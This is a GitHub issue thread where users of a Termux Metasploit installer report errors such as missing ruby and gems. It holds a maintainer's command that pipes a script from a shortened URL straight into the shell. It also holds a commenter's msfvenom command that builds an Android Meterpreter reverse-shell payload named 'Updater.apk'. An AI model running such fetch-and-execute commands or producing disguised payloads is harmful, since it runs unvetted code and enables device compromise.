### ISSUE TITLE
$ msfconsole /data/data/com.termux/files/usr/bin/env: ‘ruby’: No such file or directory

### ISSUE THREAD

**Issue by 4lf4Br4v0225CIV** [gushmazuko/metasploit_in_termux#21]
====================== * =======================
 Installation complete.
 To start msf database use: ./postgresql_ctl.sh start
 Launch metasploit by executing: msfconsole
====================== * =======================
~ $ ./postgresql_ctl.sh start
./postgresql_ctl.sh: line 3: pg_ctl: command not found
~ $ ./postgresql_ctl.sh start
./postgresql_ctl.sh: line 3: pg_ctl: command not found
~ $ msfconsole
/data/data/com.termux/files/usr/bin/env: ‘ruby’: No such file or directory

How do I resolve the problem?

**Comment by gushmazuko** [comment]
@4lf4Br4v0225CIV what do you get when you try to install ruby?
```bash
pkg install ruby
```

**Comment by Its-DJ** [comment]
It's showing ruby is installed new version .

**Comment by Mido-26** [comment]
Thanks

**Comment by 4lf4Br4v0225CIV** [comment]
After installation, here is what displays after the msfconsole command: 

"Could not find Ascii85-1.1.0 in any of the sources
Run `bundle install` to install missing gems."

**Comment by gushmazuko** [comment]
> After installation, here is what displays after the msfconsole command:
> 
> "Could not find Ascii85-1.1.0 in any of the sources
> Run `bundle install` to install missing gems."
> 
> ~ $ bundle install
> Could not locate Gemfile"
> 
> Concretely how to solve my problem so that metasploit works on my termux ?

Are you tried with latest version? 

Try installation with following command:
```bash
source <(curl -fsSL https://kutt.it/msf) 2>&1 | tee mfs-install.log
```

And share `mfs-install.log` file via https://pastebin.com here.

**Comment by BAAAHU** [comment]
Same problem how do i solve it
bash: ​curl -fsSL https://kutt.it/msf​: No such file or directory
 tee mfs-inst: command not found

**Comment by killer-design** [comment]
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1234 R > storage/downloads/Updater.apk
bash: storage/downloads/Updater.apk: Not a directory
Please give me any solution

**Comment by poorboykk** [comment]
$ msfconsole

ruby: No such file or directory -- /data/data/com.termux/files/home/metasploit-framework/msfconsole (LoadError)

**Comment by im656** [comment]
![IMG_20221130_181000.jpg](https://user-images.githubusercontent.com/114866221/204798807-c898fcd3-6ed2-4dcf-85ec-fc5503867bbb.jpg)
